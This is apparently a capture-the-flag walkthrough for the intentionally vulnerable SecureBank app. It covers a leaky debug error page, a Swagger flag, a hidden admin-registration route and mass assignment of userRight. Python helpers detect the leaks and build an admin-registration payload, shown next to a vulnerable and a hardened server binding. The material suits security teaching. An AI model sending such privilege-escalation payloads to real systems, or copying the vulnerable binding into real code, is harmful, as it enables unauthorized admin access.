Challenges
CWE-756: Missing Custom Error Page
The project is currently configured for debug, so the developer exception page is served to every client. When an unhandled exception is thrown, the attacker sees far more than they ever should: the exception type and message, a full stack trace, and the fragments of source code around the failing line.
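A quick way to confirm this from the outside is to trigger an error and check whether the body looks like a developer exception page rather than a custom error page. The check below is an added example for this write-up, not SecureBank's own code; the marker strings are assumptions based on what the ASP.NET Core developer exception page normally renders, and both sample responses are constructed.

```python
"""Detect developer-exception-page leakage (CWE-756) in HTTP response bodies."""
import re
import urllib.request

# Phrases that only reach the client when detailed errors are enabled (assumed markers).
LEAK_MARKERS = [
    "An unhandled exception occurred while processing the request",
    "DeveloperExceptionPage",
]
# A .NET stack frame with file and line information: "at Ns.Type.Method(...) in X.cs:line N".
STACK_FRAME = re.compile(r"^\s*at [\w.<>`]+\(.*\) in .+\.cs:line \d+", re.MULTILINE)
# Windows or POSIX paths to C# source files.
SOURCE_PATH = re.compile(r"[A-Za-z]:\\[^\s\"<]+\.cs|/[^\s\"<]+\.cs")


def find_leaks(body: str) -> list:
    """Return the kinds of sensitive detail present in an error response body."""
    found = []
    if any(marker in body for marker in LEAK_MARKERS):
        found.append("developer exception page")
    if STACK_FRAME.search(body):
        found.append("stack trace")
    if SOURCE_PATH.search(body):
        found.append("source file path")
    return found


def is_custom_error_page(body: str) -> bool:
    """True when nothing in the body betrays the application's internals."""
    return not find_leaks(body)


def check_url(url: str) -> list:
    """Fetch a URL expected to error out and report what its body leaks (not run offline)."""
    try:
        with urllib.request.urlopen(url) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:        # 500 pages are what we are after
        body = err.read().decode("utf-8", "replace")
    return find_leaks(body)


# Constructed samples: what a debug build leaks versus what a production page should say.
# Namespace and path names below are placeholders, not SecureBank identifiers.
DEBUG_RESPONSE = r"""<!DOCTYPE html><html><body>
<h1>An unhandled exception occurred while processing the request.</h1>
<div>NullReferenceException: Object reference not set to an instance of an object.</div>
<pre>
   at Example.App.Controllers.HomeController.Index() in C:\src\app\Controllers\HomeController.cs:line 42
   at Example.App.Middleware.Pipeline.Invoke(HttpContext ctx) in C:\src\app\Middleware\Pipeline.cs:line 17
</pre>
</body></html>"""

PROD_RESPONSE = """<html><body>
<h1>Something went wrong.</h1>
<p>Please try again later. Reference: 7f3a2c</p>
</body></html>"""

if __name__ == "__main__":
    print("debug build leaks:", find_leaks(DEBUG_RESPONSE))
    print("custom page leaks:", find_leaks(PROD_RESPONSE))
```

Point it at a route that you know throws (a malformed id, an oversized payload) and treat any non-empty result as a finding; a hardened deployment should only ever return something like the second sample.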

Swagger
Find SecureBank swagger.
Solution
Go to /swagger. You will find the flag in the Swagger description.
Hidden page
Find a page that was used during development.
Solution
If you look through the api/Auth/Register source code in the browser, you will find that one JavaScript method is commented out. Commented-out code still ships to every client, and the route it references still exists on the server.

You will find the flag if you go to /Auth/RegisterAdmin.
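Reading every script by hand does not scale, so it is worth automating the search for routes that appear only inside commented-out JavaScript. The helper below is an added example for this write-up, not SecureBank's code; the HTML sample is constructed to resemble the situation the challenge describes and is not the real page.

```python
"""Find routes referenced only in commented-out JavaScript within an HTML page."""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.DOTALL | re.IGNORECASE)
BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)
# '//' not preceded by ':' or a quote, so 'https://...' inside strings is not a comment.
LINE_COMMENT_RE = re.compile(r"(?<![:\"'])//[^\n]*")
# Quoted, absolute, site-relative paths such as '/Auth/RegisterAdmin'.
ROUTE_RE = re.compile(r"""["'`](/[A-Za-z0-9_./-]*)["'`]""")


def commented_js(html: str) -> list:
    """Return every comment (block and line) found inside the page's <script> blocks."""
    comments = []
    for script in SCRIPT_RE.findall(html):
        comments.extend(BLOCK_COMMENT_RE.findall(script))
        comments.extend(LINE_COMMENT_RE.findall(script))
    return comments


def hidden_routes(html: str) -> list:
    """Routes that occur in commented-out code but nowhere in the live code."""
    live = html
    comments = commented_js(html)
    for comment in comments:
        live = live.replace(comment, "")
    live_routes = set(ROUTE_RE.findall(live))
    found = []
    for comment in comments:
        for route in ROUTE_RE.findall(comment):
            if route not in live_routes and route not in found:
                found.append(route)
    return found


# Constructed sample: a registration page whose script keeps a disabled admin-registration method.
SAMPLE_HTML = """<html><body>
<form id="register"></form>
<script>
  function register() {
    fetch('/api/Auth/Register', { method: 'POST', body: form() });
  }
  /*
  function registerAdmin() {
    fetch('/Auth/RegisterAdmin', { method: 'POST', body: form() });
  }
  */
  // see https://example.test/docs for the public routes
</script>
</body></html>"""

if __name__ == "__main__":
    print(hidden_routes(SAMPLE_HTML))
```

Run it over every page you can reach (or over the downloaded bundle), then request each reported route directly; routes that are only reachable this way are exactly the development leftovers this challenge is about.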
Registration with admin role
You need to register a new user with admin role.
Solution
If we look at the response of api/Auth/Login, we see that it returns the following JSON.
{
"id": 0,
"userName": "carson.alexander@ssrd.io",
"password": null,
"name": null,
"surname": null,
"userRight": 0,
"cookie": "Y2Fyc29uLmFsZXhhbmRlckBzc3JkLmlv-079f6a2418056497a2651c7d72d787c79d5d7095dedd68e95464ba631de16625-0",
"status": "ok",
"siteAction": null,
"token": null
}
Auth/Register uses the same model, and the server binds userRight straight from the request body instead of assigning it itself. So register a new user with userRight set to a number greater than 50:
{
"id": 0,
"userName": "testAdmin@ssrd.io",
"password": "Password1!",
"name": null,
"surname": null,
"userRight": 100,
"cookie": null,
"status": null,
"siteAction": null,
"token": null
}
You will find the flag in the response header.
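The underlying weakness is mass assignment: a response model shared with the registration endpoint lets the client set a field that only the server should control. The script below is an added example for this write-up, not SecureBank's code. It builds the registration payload from the model shape shown above, and it includes a small Python sketch of the binding behaviour on the server side (vulnerable beside hardened) to show why the payload works; the threshold of 50 is taken from the write-up, while the server-side functions, the JSON content type and the `is_admin` helper are assumptions for illustration.

```python
"""Mass-assignment of userRight via the shared Auth model."""
import json
import urllib.request

ADMIN_THRESHOLD = 50  # per the write-up, userRight above 50 is treated as admin


def auth_model(user_name, password=None, **fields):
    """The JSON model returned by api/Auth/Login and accepted by api/Auth/Register."""
    model = {
        "id": 0, "userName": user_name, "password": password,
        "name": None, "surname": None, "userRight": 0,
        "cookie": None, "status": None, "siteAction": None, "token": None,
    }
    model.update(fields)
    return model


def admin_registration(user_name, password, user_right=100):
    """Registration payload with a client-chosen, above-threshold userRight."""
    return auth_model(user_name, password, userRight=user_right)


def post_register(base_url, payload):
    """POST the payload to api/Auth/Register and return the response headers (network; not run offline)."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/Auth/Register",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},  # assumed content type
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        return dict(resp.getheaders())


# --- Server-side sketch (constructed): why the payload is honoured, and how to stop it ---

def vulnerable_register(body):
    """Binds every field of the shared model, so the client decides its own userRight."""
    user = auth_model(body["userName"])
    user.update({k: v for k, v in body.items() if k in user})
    user["password"] = None          # never echo the password back
    return user


def hardened_register(body):
    """Binds only the fields a self-registration may set; userRight is server-assigned."""
    allowed = ("userName", "name", "surname")
    user = auth_model(body["userName"])
    for key in allowed:
        if key in body:
            user[key] = body[key]
    user["userRight"] = 0            # privilege is granted elsewhere, never from the request
    return user


def is_admin(user):
    return user["userRight"] > ADMIN_THRESHOLD


if __name__ == "__main__":
    payload = admin_registration("testAdmin@ssrd.io", "Password1!")
    print(json.dumps(payload, indent=2))
    print("vulnerable binding grants admin:", is_admin(vulnerable_register(payload)))
    print("hardened binding grants admin:  ", is_admin(hardened_register(payload)))
```

The fix is the second binding: give the registration endpoint its own input model that simply has no userRight field, so there is nothing for the client to overwrite. Against the live target, `post_register(base_url, payload)` returns the headers of the registration response, which is where the flag is reported.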